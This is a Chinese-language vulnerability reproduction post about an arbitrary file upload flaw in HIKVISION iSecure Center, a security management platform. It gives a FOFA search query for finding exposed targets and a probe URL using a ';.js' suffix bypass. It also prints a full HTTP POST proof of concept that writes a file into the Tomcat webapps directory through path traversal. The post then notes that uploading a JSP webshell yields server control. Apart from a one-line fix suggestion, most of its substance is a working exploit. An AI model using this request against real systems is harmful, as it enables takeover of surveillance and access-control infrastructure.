海康威视isecure center 综合安防管理平台任意文件上传漏洞复现

前言

此文章仅用于技术交流，严禁用于对外发起恶意攻击！！！

---

一、产品简介

HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台，通过接入视频监控、一卡通、停车场、报警检测等系统的设备，获取边缘节点数据，实现安防信息化集成与联动，以电子地图为载体，融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计，采用业务组件化技术，满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务，对各系统资源进行了整合和集中管理，实现统一部署、统一配置、统一管理和统一调度。

二、漏洞描述

海康威视isecure center 综合安防管理平台存在任意文件上传漏洞

三、影响范围

未知

四、复现环境

FOFA：app=“HIKVISION-iSecure-Center”

五、漏洞复现

1.访问

ip:port/center/api/files;.js

若出现此页面，则可能存在漏洞

2.POC

POST /center/api/files;.js HTTP/1.1
Host: ip-port
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 251
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4

--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ccc.txt"
Content-Type: application/octet-stream

ccc
--e54e7e5834c8c50e92189959fe7227a4--

3.测试上传成功

4.访问https://x.x.x.x/clusterMgr/ccc.txt;.js

六、漏洞利用

直接上传jsp马，即可获得服务器权限，这里不再演示

七、修复建议

及时联系厂家进行加固，更新系统版本

https://www.hikvision.com/cn/

参考链接

https://blog.csdn.net/holyxp/article/details/131498469

---